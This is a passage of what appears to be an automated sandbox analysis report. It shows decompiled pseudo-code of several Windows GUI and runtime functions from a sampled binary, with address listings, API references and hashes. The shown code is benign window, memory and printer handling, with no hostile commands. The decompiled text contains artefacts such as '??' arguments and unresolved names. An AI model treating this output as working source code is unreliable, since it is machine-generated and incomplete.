						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E0041F108( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E0041547B(0, _t51, _t62, _t65, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E0041547B(0, _t51, _t62, _t65, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E00413D98(_t53);
							}
							 *(_t65 + 0xc) = _t42;
							E004281D0(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E00429303(_t36);
			}














                  0x0041f356
                  0x0041f35d
                  0x0041f362
                  0x0041f364
                  0x0041f367
                  0x0041f36b
                  0x0041f36e
                  0x0041f374
                  0x0041f37b
                  0x0041f47c
                  0x0041f38a
                  0x0041f392
                  0x0041f396
                  0x0041f3ca
                  0x0041f3cd
                  0x0041f3d2
                  0x0041f3d4
                  0x0041f3e0
                  0x0041f3e0
                  0x0041f3d6
                  0x0041f3d6
                  0x0041f3dc
                  0x0041f3dc
                  0x0041f3e2
                  0x0041f3e7
                  0x0041f3ea
                  0x0041f3ed
                  0x0041f3f0
                  0x00000000
                  0x0041f398
                  0x0041f398
                  0x0041f39e
                  0x0041f3ad
                  0x0041f3ad
                  0x0041f3b0
                  0x0041f414
                  0x0041f41a
                  0x0041f41f
                  0x0041f3b2
                  0x0041f3b7
                  0x0041f3bd
                  0x0041f3c0
                  0x0041f3c0
                  0x0041f427
                  0x0041f42c
                  0x0041f432
                  0x0041f432
                  0x0041f43a
                  0x0041f44b
                  0x0041f457
                  0x0041f45c
                  0x0041f462
                  0x0041f462
                  0x0041f39e
                  0x0041f465
                  0x0041f46a
                  0x0041f474
                  0x0041f474
                  0x0041f477
                  0x0041f477
                  0x0041f47d
                  0x0041f488

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 0041F35D
                  • EnterCriticalSection.KERNEL32(?,00000010,0041F619,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F36E
                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1,?,?,004382C8), ref: 0041F38C
                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E), ref: 0041F3C0
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1), ref: 0041F42C
                  • _memset.LIBCMT ref: 0041F44B
                  • TlsSetValue.KERNEL32(?,00000000), ref: 0041F45C
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0042084C,0040C879,0041196D,?,0040CD7B,?,0040104E,A6E2BCA1,?,?,004382C8), ref: 0041F47D
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                  • String ID:
                  • API String ID: 1891723912-0
                  • Opcode ID: 17063f34dc344c93a15c83e00e71e723195f7900d4713094e52f02ed4555f1c6
                  • Instruction ID: c53f380656f35289a2d3609ec69209c8b082339f46005d3b10dfd96134c05814
                  • Opcode Fuzzy Hash: 17063f34dc344c93a15c83e00e71e723195f7900d4713094e52f02ed4555f1c6
                  • Instruction Fuzzy Hash: FB318070500605EFCB10EF61D885CABB7B4FF14310B10C53FE99696660CB38AD96CB89
                  Uniqueness

                  Uniqueness Score: 3.53%

                  Function 00413AC6, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 117threadwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E00413AC6(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				short _v10;
				char _v528;
				struct HWND__* _v532;
				signed int _v536;
				long _v540;
				struct HWND__* _v544;
				intOrPtr _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t55;
				intOrPtr _t58;
				long _t61;
				struct HWND__* _t64;
				WCHAR* _t65;
				void* _t66;
				void* _t68;
				void* _t72;
				void* _t73;
				long _t74;
				void* _t75;
				void* _t76;
				signed int _t78;
				void* _t79;
				signed int _t83;

				_t72 = __edx;
				_t81 = _t83;
				_t36 =  *0x44c364; // 0xa6e2bca1
				_v8 = _t36 ^ _t83;
				_t74 = _a4;
				_t78 = 0;
				_v548 = _a8;
				E004139DB(0);
				_t68 = _t73;
				_t64 = E00413A14(0,  &_v532);
				_v544 = _t64;
				if(_t64 != _v532) {
					EnableWindow(_t64, 1);
				}
				_v540 = _v540 & _t78;
				GetWindowThreadProcessId(_t64,  &_v540);
				if(_t64 == 0 || _v540 != GetCurrentProcessId()) {
					L7:
					__eflags = _t74;
					if(__eflags != 0) {
						_t12 = _t74 + 0x78; // 0x78
						_t78 = _t12;
					}
					goto L9;
				} else {
					_t61 = SendMessageW(_t64, 0x376, 0, 0);
					if(_t61 == 0) {
						goto L7;
					} else {
						_t78 = _t61;
						L9:
						_v536 = _v536 & 0x00000000;
						if(_t78 != 0) {
							_v536 =  *_t78;
							_t58 = _a16;
							if(_t58 != 0) {
								 *_t78 = _t58 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t55 = _a12 & 0x0000000f;
							if(_t55 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t55 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v528 = 0;
						_t98 = _t74;
						if(_t74 == 0) {
							_t65 =  &_v528;
							_t74 = 0x104;
							__eflags = GetModuleFileNameW(0, _t65, 0x104) - 0x104;
							if(__eflags == 0) {
								__eflags = 0;
								_v10 = 0;
							}
						} else {
							_t65 =  *(_t74 + 0x50);
						}
						_push(_a12);
						_push(_t65);
						_push(_v548);
						_push(_v544);
						_t75 = E0040CB2A(_t65, _t68, _t74, _t78, _t98);
						if(_t78 != 0) {
							 *_t78 = _v536;
						}
						if(_v532 != 0) {
							EnableWindow(_v532, 1);
						}
						E004139DB(1);
						_pop(_t76);
						_pop(_t79);
						_pop(_t66);
						return E00427DFF(_t75, _t66, _v8 ^ _t81, _t72, _t76, _t79);
					}
				}
			}































                  0x00413ac6
                  0x00413ac9
                  0x00413ad1
                  0x00413ad8
                  0x00413ae1
                  0x00413ae4
                  0x00413ae7
                  0x00413aed
                  0x00413af2
                  0x00413b00
                  0x00413b02
                  0x00413b0e
                  0x00413b13
                  0x00413b13
                  0x00413b19
                  0x00413b27
                  0x00413b2f
                  0x00413b57
                  0x00413b57
                  0x00413b59
                  0x00413b5b
                  0x00413b5b
                  0x00413b5b
                  0x00000000
                  0x00413b3f
                  0x00413b49
                  0x00413b51
                  0x00000000
                  0x00413b53
                  0x00413b53
                  0x00413b5e
                  0x00413b5e
                  0x00413b67
                  0x00413b6b
                  0x00413b71
                  0x00413b76
                  0x00413b7d
                  0x00413b7d
                  0x00413b76
                  0x00413b83
                  0x00413b88
                  0x00413b8e
                  0x00413b9e
                  0x00413b9e
                  0x00413b9e
                  0x00413b90
                  0x00413b96
                  0x00413b98
                  0x00413b98
                  0x00413b96
                  0x00413b8e
                  0x00413ba4
                  0x00413bab
                  0x00413bad
                  0x00413bb4
                  0x00413bba
                  0x00413bcb
                  0x00413bcd
                  0x00413bcf
                  0x00413bd1
                  0x00413bd1
                  0x00413baf
                  0x00413baf
                  0x00413baf
                  0x00413bd5
                  0x00413bd8
                  0x00413bd9
                  0x00413bdf
                  0x00413bed
                  0x00413bf1
                  0x00413bf9
                  0x00413bf9
                  0x00413c02
                  0x00413c0c
                  0x00413c0c
                  0x00413c14
                  0x00413c1f
                  0x00413c20
                  0x00413c23
                  0x00413c2a
                  0x00413c2a
                  0x00413b51

                  APIs
                    • Part of subcall function 00413A14: GetParent.USER32(?), ref: 00413A68
                    • Part of subcall function 00413A14: GetLastActivePopup.USER32(?), ref: 00413A79
                    • Part of subcall function 00413A14: IsWindowEnabled.USER32(?), ref: 00413A8D
                    • Part of subcall function 00413A14: EnableWindow.USER32(?,00000000), ref: 00413AA0
                  • EnableWindow.USER32(?,00000001), ref: 00413B13
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00413B27
                  • GetCurrentProcessId.KERNEL32 ref: 00413B31
                  • SendMessageW.USER32(?,00000376,00000000,00000000), ref: 00413B49
                  • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00413BC5
                  • EnableWindow.USER32(00000000,00000001), ref: 00413C0C
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$Enable$Process$ActiveCurrentEnabledFileLastMessageModuleNameParentPopupSendThread
                  • String ID: 0
                  • API String ID: 1877664794-4108050209
                  • Opcode ID: 828f8a67a036c3dfd865f62085fa5df72546dff608ea06814d0ef942e0615404
                  • Instruction ID: b43ff5600c3387bb6847945249b250cbf2826ec3f7bdb4896dd086ef5827ba55
                  • Opcode Fuzzy Hash: 828f8a67a036c3dfd865f62085fa5df72546dff608ea06814d0ef942e0615404
                  • Instruction Fuzzy Hash: 8241C471A442189BCB20DF25DC89BDAB7B4EF14715F10059AF419E7291E774EFC08B98
                  Uniqueness

                  Uniqueness Score: 0.32%

                  Function 0040B9B5, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 84COMMON
                  Download Yara Rule
                  C-Code - Quality: 66%
                  			E0040B9B5(intOrPtr _a4, intOrPtr* _a8) {
				void _v20;
				int _t15;
				int _t19;
				intOrPtr* _t27;
				void* _t31;
				intOrPtr* _t37;
				intOrPtr _t40;

				if(E0040B7ED() == 0) {
					if(_a4 != 0x12340042) {
						L13:
						_t15 = 0;
						L14:
						return _t15;
					}
					_t27 = _a8;
					if(_t27 == 0 ||  *_t27 < 0x28 || SystemParametersInfoA(0x30, 0,  &_v20, 0) == 0) {
						goto L13;
					} else {
						 *((intOrPtr*)(_t27 + 4)) = 0;
						 *((intOrPtr*)(_t27 + 8)) = 0;
						 *((intOrPtr*)(_t27 + 0xc)) = GetSystemMetrics(0);
						_t19 = GetSystemMetrics(1);
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						 *(_t27 + 0x10) = _t19;
						 *((intOrPtr*)(_t27 + 0x24)) = 1;
						if( *_t27 >= 0x68) {
							MultiByteToWideChar(0, 0, "DISPLAY", 0xffffffff, _t27 + 0x28, 0x20);
						}
						_t15 = 1;
						goto L14;
					}
				}
				_t37 = _a8;
				_t31 =  *0x44f5c0(_a4, _t37);
				if(_t31 != 0) {
					_t40 =  *0x44f5d0; // 0x0
					if(_t40 == 0 &&  *_t37 >= 0x68) {
						_t3 = _t37 + 0x28; // 0x28
						MultiByteToWideChar(0, 0, _t3, 0xffffffff, _t3, 0x20);
					}
				}
				return _t31;
			}










                  0x0040b9c6
                  0x0040ba07
                  0x0040ba72
                  0x0040ba72
                  0x0040ba74
                  0x00000000
                  0x0040ba74
                  0x0040ba09
                  0x0040ba10
                  0x00000000
                  0x0040ba29
                  0x0040ba29
                  0x0040ba2c
                  0x0040ba3a
                  0x0040ba3d
                  0x0040ba45
                  0x0040ba46
                  0x0040ba47
                  0x0040ba48
                  0x0040ba4f
                  0x0040ba52
                  0x0040ba55
                  0x0040ba68
                  0x0040ba68
                  0x0040ba6e
                  0x00000000
                  0x0040ba6e
                  0x0040ba10
                  0x0040b9c8
                  0x0040b9d5
                  0x0040b9db
                  0x0040b9dd
                  0x0040b9e3
                  0x0040b9ec
                  0x0040b9f5
                  0x0040b9f5
                  0x0040b9e3
                  0x00000000

                  APIs
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000028,000000FF,00000028,00000020), ref: 0040B9F5
                  • SystemParametersInfoA.USER32(00000030,00000000,00000000,00000000), ref: 0040BA1F
                  • GetSystemMetrics.USER32(00000000), ref: 0040BA36
                  • GetSystemMetrics.USER32(00000001), ref: 0040BA3D
                  • MultiByteToWideChar.KERNEL32(00000000,00000000,DISPLAY,000000FF,-00000028,00000020), ref: 0040BA68
                  Strings
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: System$ByteCharMetricsMultiWide$InfoParameters
                  • String ID: B$DISPLAY
                  • API String ID: 381819527-3316187204
                  • Opcode ID: 18cf5bd3d32a6fc675a34ba076df6cdcb9c96563850dcf6491ffc36bc25d5e89
                  • Instruction ID: fca5cd48419685536342a7f9a56001a02b268863b5be9df2b18fe92301318a5e
                  • Opcode Fuzzy Hash: 18cf5bd3d32a6fc675a34ba076df6cdcb9c96563850dcf6491ffc36bc25d5e89
                  • Instruction Fuzzy Hash: 8921F171644321EBDF208F21CC84B6B7A68EB0A760F004236FD15AA2D1D774D900CBED
                  Uniqueness

                  Uniqueness Score: 0.61%

                  Function 0040E5D3, Relevance: 12.1, APIs: 8, Instructions: 125windowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 92%
                  			E0040E5D3(int __ecx, intOrPtr _a4, intOrPtr _a8, signed int _a12, signed int _a16, struct tagRECT* _a20, signed int _a24, intOrPtr _a28) {
				int _v8;
				intOrPtr _v12;
				int _v16;
				int _v20;
				struct tagRECT _v36;
				void* _v40;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t61;
				int _t62;
				signed int _t64;
				int _t72;
				intOrPtr* _t84;
				struct HWND__* _t90;

				_t72 = __ecx;
				_t74 = _a28;
				_v8 = 0;
				_v12 = _a28;
				_v16 = 0;
				_v20 = 0;
				if(_a24 == 0) {
					GetClientRect( *(__ecx + 0x20),  &_v36);
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				_t61 = _a16 & 0xffff7fff;
				_a24 = _t61;
				if(_t61 == 1) {
					_t13 =  &_v40;
					 *_t13 = _v40 & 0x00000000;
					__eflags =  *_t13;
				} else {
					_v40 = BeginDeferWindowPos(8);
				}
				_t62 = GetTopWindow( *(_t72 + 0x20));
				while(1) {
					_t90 = _t62;
					if(_t90 == 0) {
						break;
					}
					_t72 = GetDlgCtrlID(_t90);
					_t64 = E0040E23A(_t72, _t74, 0, _t90, __eflags, _t90);
					__eflags = _t72 - _a12;
					if(__eflags != 0) {
						__eflags = _t72 - _a4;
						if(__eflags >= 0) {
							__eflags = _t72 - _a8;
							if(__eflags <= 0) {
								__eflags = _t64;
								if(__eflags != 0) {
									SendMessageW(_t90, 0x361, 0,  &_v40);
								}
							}
						}
					} else {
						_v8 = _t90;
					}
					_t62 = GetWindow(_t90, 2);
				}
				if(_a24 != 1) {
					__eflags = _a12;
					if(_a12 != 0) {
						__eflags = _v8;
						if(_v8 != 0) {
							_t62 = E0040E20E(_t72, _t74, _v8);
							__eflags = _a24 - 2;
							if(_a24 == 2) {
								_t84 = _a20;
								_v36.left = _v36.left +  *_t84;
								_v36.top = _v36.top +  *((intOrPtr*)(_t84 + 4));
								_v36.right = _v36.right -  *((intOrPtr*)(_t84 + 8));
								_t45 =  &(_v36.bottom);
								 *_t45 = _v36.bottom -  *((intOrPtr*)(_t84 + 0xc));
								__eflags =  *_t45;
							}
							__eflags = _a16 & 0x00008000;
							if((_a16 & 0x00008000) == 0) {
								 *((intOrPtr*)( *_t62 + 0x68))( &_v36, 0);
								_t62 = E0040C357( &_v40, _v8,  &_v36);
							}
						}
					}
					__eflags = _v40;
					if(_v40 != 0) {
						_t62 = EndDeferWindowPos(_v40);
					}
				} else {
					if(_a28 == 0) {
						_t62 = _a20;
						 *((intOrPtr*)(_t62 + 8)) = _v20;
						 *((intOrPtr*)(_t62 + 4)) = 0;
						 *_t62 = 0;
						 *((intOrPtr*)(_t62 + 0xc)) = _v16;
					} else {
						_t62 = CopyRect(_a20,  &_v36);
					}
				}
				return _t62;
			}


















                  0x0040e5e2
                  0x0040e5e4
                  0x0040e5e8
                  0x0040e5eb
                  0x0040e5ee
                  0x0040e5f1
                  0x0040e5f6
                  0x0040e608
                  0x0040e5f8
                  0x0040e5fb
                  0x0040e5fc
                  0x0040e5fd
                  0x0040e5fe
                  0x0040e5fe
                  0x0040e611
                  0x0040e616
                  0x0040e61c
                  0x0040e62b
                  0x0040e62b
                  0x0040e62b
                  0x0040e61e
                  0x0040e626
                  0x0040e626
                  0x0040e632
                  0x0040e67d
                  0x0040e67d
                  0x0040e681
                  0x00000000
                  0x00000000
                  0x0040e644
                  0x0040e646
                  0x0040e64b
                  0x0040e64e
                  0x0040e655
                  0x0040e658
                  0x0040e65a
                  0x0040e65d
                  0x0040e65f
                  0x0040e661
                  0x0040e66e
                  0x0040e66e
                  0x0040e661
                  0x0040e65d
                  0x0040e650
                  0x0040e650
                  0x0040e650
                  0x0040e677
                  0x0040e677
                  0x0040e687
                  0x0040e6b3
                  0x0040e6b6
                  0x0040e6b8
                  0x0040e6bb
                  0x0040e6c0
                  0x0040e6c5
                  0x0040e6c9
                  0x0040e6cb
                  0x0040e6d0
                  0x0040e6d6
                  0x0040e6dc
                  0x0040e6e2
                  0x0040e6e2
                  0x0040e6e2
                  0x0040e6e2
                  0x0040e6e5
                  0x0040e6ec
                  0x0040e6f7
                  0x0040e705
                  0x0040e705
                  0x0040e6ec
                  0x0040e6bb
                  0x0040e70a
                  0x0040e70d
                  0x0040e712
                  0x0040e712
                  0x0040e689
                  0x0040e68c
                  0x0040e69d
                  0x0040e6a3
                  0x0040e6a9
                  0x0040e6ac
                  0x0040e6ae
                  0x0040e68e
                  0x0040e695
                  0x0040e695
                  0x0040e68c
                  0x0040e71c

                  APIs
                  • GetClientRect.USER32(?,?), ref: 0040E608
                  • BeginDeferWindowPos.USER32(00000008), ref: 0040E620
                  • GetTopWindow.USER32(?), ref: 0040E632
                  • GetDlgCtrlID.USER32(00000000), ref: 0040E63D
                  • SendMessageW.USER32(00000000,00000361,00000000,00000000), ref: 0040E66E
                  • GetWindow.USER32(00000000,00000002), ref: 0040E677
                  • CopyRect.USER32(?,?), ref: 0040E695
                  • EndDeferWindowPos.USER32(00000000), ref: 0040E712
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$DeferRect$BeginClientCopyCtrlMessageSend
                  • String ID:
                  • API String ID: 1228040700-0
                  • Opcode ID: 67fd11745653930679c376aaf3d6b4f1722f198f74043795e1cb311766914da4
                  • Instruction ID: b7f4198c190bd397e805bd7f4763771c5cc0ce2e7b37bf3c3ca447f4290ee0df
                  • Opcode Fuzzy Hash: 67fd11745653930679c376aaf3d6b4f1722f198f74043795e1cb311766914da4
                  • Instruction Fuzzy Hash: 8E417B71900209DFCF10DFA5D8888EEB7B5FF68300B10497AE801B7290C77A9960CFA9
                  Uniqueness

                  Uniqueness Score: 0.43%

                  Function 004130CD, Relevance: 12.1, APIs: 8, Instructions: 106windowstringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 91%
                  			E004130CD(intOrPtr __ecx, void* __eflags) {
				int _v8;
				struct HWND__* _v12;
				intOrPtr _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				struct HWND__* _t47;
				intOrPtr _t50;
				intOrPtr _t51;
				void* _t53;
				int _t55;
				void* _t57;
				intOrPtr* _t63;
				int _t65;
				void* _t69;
				void* _t84;
				void* _t86;
				intOrPtr _t87;
				void* _t90;

				_t90 = __eflags;
				_t87 = __ecx;
				E004281D0(_t84,  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x74)) + 0x1c)) + (lstrlenW( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1) * 2, 0,  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x74)) + 0x20)) - lstrlenW( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1 +  *((intOrPtr*)( *((intOrPtr*)(_t87 + 0x74)) + 0x20)) - lstrlenW( *( *((intOrPtr*)(__ecx + 0x74)) + 0x1c)) + 1);
				_t47 = GetFocus();
				_t85 =  *((intOrPtr*)(_t87 + 0x74));
				_t73 = _t87;
				_v12 = _t47;
				_v8 = 0;
				 *( *((intOrPtr*)(_t87 + 0x74)) + 4) = E0041E7B8(0, _t87, _t90);
				E0040E2C7(0,  *((intOrPtr*)(_t87 + 0x74)), _t90);
				_t50 =  *((intOrPtr*)(_t87 + 0x74));
				_t69 = EnableWindow;
				if( *(_t50 + 4) != 0) {
					_t65 = IsWindowEnabled( *(_t50 + 4));
					_t92 = _t65;
					if(_t65 != 0) {
						_v8 = 1;
						EnableWindow( *( *((intOrPtr*)(_t87 + 0x74)) + 4), 0);
					}
				}
				_t51 = E00420285(_t69, _t85, _t87, _t92);
				_v16 = _t51;
				if( *((intOrPtr*)(_t87 + 0x78)) == 1) {
					L6:
					E00410178(_t69, __eflags, _t87);
					goto L7;
				} else {
					_t73 =  *((intOrPtr*)(_t87 + 0x74));
					if(( *( *((intOrPtr*)(_t87 + 0x74)) + 0x34) & 0x00080000) == 0) {
						goto L6;
					}
					 *((intOrPtr*)(_t51 + 0x18)) = _t87;
					L7:
					_t95 =  *((intOrPtr*)(_t87 + 0x78)) - 1;
					if( *((intOrPtr*)(_t87 + 0x78)) != 1) {
						__eflags =  *((intOrPtr*)(_t87 + 0x88));
						_push( *((intOrPtr*)(_t87 + 0x74)));
						if(__eflags == 0) {
							_t53 = E004126F5(_t73);
						} else {
							_t53 = E004126D9(_t73);
						}
						_t86 = _t53;
					} else {
						E00412AE3(_t69, _t87, _t85, _t87, _t95);
						_t63 =  *((intOrPtr*)(_t87 + 0x80));
						_t86 = (0 |  *((intOrPtr*)( *_t63 + 0xc))(_t63,  *( *((intOrPtr*)(_t87 + 0x74)) + 4)) != 0x00000000) + 1;
					}
					 *(_v16 + 0x18) =  *(_v16 + 0x18) & 0x00000000;
					if(_v8 != 0) {
						EnableWindow( *( *((intOrPtr*)(_t87 + 0x74)) + 4), 1);
					}
					_t55 = IsWindow(_v12);
					_t98 = _t55;
					if(_t55 != 0) {
						SetFocus(_v12);
					}
					E0041E7F4(_t69, _t87, _t86, _t87, _t98);
					if(_t86 == 0) {
						_t57 = 2;
						return _t57;
					} else {
						return _t86;
					}
				}
			}























                  0x004130cd
                  0x004130d7
                  0x004130fc
                  0x00413104
                  0x0041310a
                  0x0041310d
                  0x0041310f
                  0x00413112
                  0x0041311a
                  0x0041311d
                  0x00413122
                  0x00413128
                  0x0041312e
                  0x00413133
                  0x00413139
                  0x0041313b
                  0x00413145
                  0x0041314c
                  0x0041314c
                  0x0041313b
                  0x0041314e
                  0x00413157
                  0x0041315a
                  0x0041316d
                  0x0041316e
                  0x00000000
                  0x0041315c
                  0x0041315c
                  0x00413166
                  0x00000000
                  0x00000000
                  0x00413168
                  0x00413173
                  0x00413173
                  0x00413177
                  0x0041319e
                  0x004131a5
                  0x004131a8
                  0x004131b1
                  0x004131aa
                  0x004131aa
                  0x004131aa
                  0x004131b6
                  0x00413179
                  0x0041317b
                  0x00413183
                  0x0041319a
                  0x0041319a
                  0x004131bb
                  0x004131c3
                  0x004131cd
                  0x004131cd
                  0x004131d2
                  0x004131d8
                  0x004131da
                  0x004131df
                  0x004131df
                  0x004131e7
                  0x004131ee
                  0x004131f6
                  0x00000000
                  0x004131f0
                  0x00000000
                  0x004131f0
                  0x004131ee

                  APIs
                  • lstrlenW.KERNEL32(?,?,?,?,00000000,00000000,00000001,?,?,?,000000B0,A6E2BCA1), ref: 004130E0
                  • _memset.LIBCMT ref: 004130FC
                  • GetFocus.USER32 ref: 00413104
                    • Part of subcall function 0040E2C7: UnhookWindowsHookEx.USER32(?), ref: 0040E2F7
                  • IsWindowEnabled.USER32(00000006), ref: 00413133
                  • EnableWindow.USER32(00000006,00000000), ref: 0041314C
                  • EnableWindow.USER32(00000006,00000001), ref: 004131CD
                  • IsWindow.USER32(00000000), ref: 004131D2
                  • SetFocus.USER32(00000000), ref: 004131DF
                  Memory Dump Source
                  • Source File: 00000004.00000002.296909566.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000004.00000002.296903831.00400000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.296986614.0043A000.00000002.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297039400.0044B000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297057249.0044F000.00000004.00020000.sdmp Download File
                  • Associated: 00000004.00000002.297072199.00452000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_4_2_400000_982.jbxd
                  Similarity
                  • API ID: Window$EnableFocus$EnabledHookUnhookWindows_memsetlstrlen
                  • String ID:
                  • API String ID: 3424750955-0
                  • Opcode ID: e8ab3cbe979cc04d228fefbcca429c0d9c2cb50ca7a4107e7af1efe6523722b4
                  • Instruction ID: 1e38beaecc91a3a07e979ff4f7f181897a2b97c0ab68874d8d63fe70394f3af5
                  • Opcode Fuzzy Hash: e8ab3cbe979cc04d228fefbcca429c0d9c2cb50ca7a4107e7af1efe6523722b4
                  • Instruction Fuzzy Hash: EF410230600600EFCB229F75C949B9ABBF5FF44705F14856EE446872A1CB79ED91CB49
                  Uniqueness

                  Uniqueness Score: 7.75%

                  Function 0041CE1B, Relevance: 12.1, APIs: 8, Instructions: 66memorystringUNIQUE
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0041CE1B(void* __ecx, short* _a4) {
				void* _v8;
				void* _t17;
				void* _t23;
				void* _t37;

				_push(__ecx);
				_t37 = __ecx;
				_t17 =  *(__ecx + 0x74);
				if(_t17 != 0) {
					_t17 = lstrcmpW(GlobalLock(_t17) + ( *(_t18 + 2) & 0x0000ffff) * 2, _a4);
					if(_t17 == 0) {
						_t17 = OpenPrinterW(_a4,  &_v8, 0);
						if(_t17 != 0) {
							_t21 =  *(_t37 + 0x70);
							if( *(_t37 + 0x70) != 0) {
								E00420981(_t21);
							}
							_t23 = GlobalAlloc(0x42, DocumentPropertiesW(0, _v8, _a4, 0, 0, 0));
							 *(_t37 + 0x70) = _t23;
							if(DocumentPropertiesW(0, _v8, _a4, GlobalLock(_t23), 0, 2) != 1) {
								E00420981( *(_t37 + 0x70));
								 *(_t37 + 0x70) = 0;
							}
							_t17 = ClosePrinter(_v8);
						}
					}
				}
				return _t17;
			}







                  0x0041ce20
                  0x0041ce22
                  0x0041ce24
                  0x0041ce2c
                  0x0041ce47
                  0x0041ce4f
                  0x0041ce59
                  0x0041ce60
                  0x0041ce62
                  0x0041ce67
                  0x0041ce6a
